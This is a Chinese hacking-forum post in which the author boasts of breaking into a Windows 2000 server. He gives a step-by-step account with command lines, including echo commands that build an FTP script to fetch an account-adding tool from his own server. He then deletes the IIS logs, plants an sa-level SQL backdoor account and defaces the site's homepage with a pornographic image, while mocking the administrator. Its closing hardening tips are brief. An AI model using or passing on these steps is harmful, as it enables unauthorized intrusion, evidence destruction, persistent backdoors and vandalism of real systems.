|
 | 作者: jwm3337 [jwm3337]
 论坛用户 |
登录 |
| 第一章 找到一台破机器,看着他开了21、80、135、139、1433、3389 心想蛮好破的,本来没什么兴趣,先用sql客户端连接,sa空密码试试。。。。 居然设置了密码,这个网管的智商可能大于40,呵呵,再看看U之类的喽。。。。 扫描结果显示有U,3389登录上去发现没有输入法漏洞,faint,我还真不知道这service pack怎么能打出这副样子出来,照说打了之后应该没有U漏洞啊。。。。 随便敲个dir+c:\tftp*+/s,等了半天(这机器很烂),居然没有,估计是被尼姆达搞得不行了,才出此烂招,f\*\*!!! 为了快一点,dir+c:\winnt\system32\ftp.exe,没有!!faint!!! 连这个都删??!!比我还变态。。。真没折了?那我的扫描记录留在那里多危险啊!! 靠,这么变态的网管,搞他没商量!!! 想了3秒种,得出了一个结论: 。。。。。。。。。。 其实FTP.exe是存在的~~,在哪里呢? 第二章 ���蕖�~,他不是爱打services pack吗?凭他这么智障的网管,肯定忘记了在service pack有一个备份,微软为我们考虑得还挺周到啊,哈哈哈哈 吸取教训,直接整个硬盘查找,慢就慢点吧 dir c:\ftp.exe /s,果然在service pack下面有这个鸟文件,copy过来。。。 好了,echo open xxx.xxx.xxx.xxx >d 连接到我的ftp服务器(我不会告诉你的~~) echo xxxxxx >>d 我的帐号,当然也不会告诉你 echo xxxxxx >>d 我的密码,你认为我会告诉你吗? echo bin >>d 为什么?你们想想吧,反正加上不会遇到麻烦 echo get xxxxx >>d 方法太烂,不好意思告诉你,反正是可以用来加帐号的东西就行 echo bye >>d 礼貌一点,和我得FTP服务器说byebye OK, ftp -s:d 等着吧,一会儿功夫,报告cgi error,不管他,dir。。。。 shit !!!没有传过来,难道我的服务器....???? 连接上我的服务器看看,一切正常啊, type d ,也很正常啊,怎么回事情? ping 目标,发现速度奇慢,我大概知道怎么回事情了!!! 改写d!!! echo open xxxxx >d echo asdfasdf >>d echo adsfasdf >>d echo user xxxxx >>d echo xxxxx >>d echo bin >>d echo get xxxx >>d echo bye >>d OK ftp -s:d 这次好了,原因不明 连接进去,加帐号,然后3389进去。。。。 第三章 忽然说我这个帐号无权登录,faint!!! 黑个破站怎么这么烦??!! 改terminal services登录帐户限制 在我的机器上点击“我的电脑”-》管理-》\\xxx.xxx.xxx.xxx-》确定(谁会按取消啊,真是。。。) 等了半个世纪左右,出来了服务列表,修改terminal services“属性”,登录帐户修改为“本机上的帐户”,重新启动terminalservices 服务,退出 再从3389登录进去,TMD,总算看到win2000的桌面了。 后记 停掉WWW服务,冲到c:\winnt\system32\logfiles下删w3svc日志, 在sql server里放个帐号,当然权限了sa一致,以后不爽了还能进来逛逛。。。。。 哇哈哈,不怕×Police×叔叔来找我喽~~!! 顺手改掉他那难看的index.html,放个黄色图片吧,凭那位网管的智商,大概也就看得懂这些了。。。 总结: 1)如果漏洞补丁没打全,那么就不要开这个服务; 2)删除文件时要考虑到备份文件是否存在; 3)端口能少开就少开,少开一点不会死,开多了死得难看。 |
| 地主 发表时间: 09/21 13:07 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 菜鸟乐园 标题: 大家进!黑个站好难!!!!!!!!!!!!!!!!!!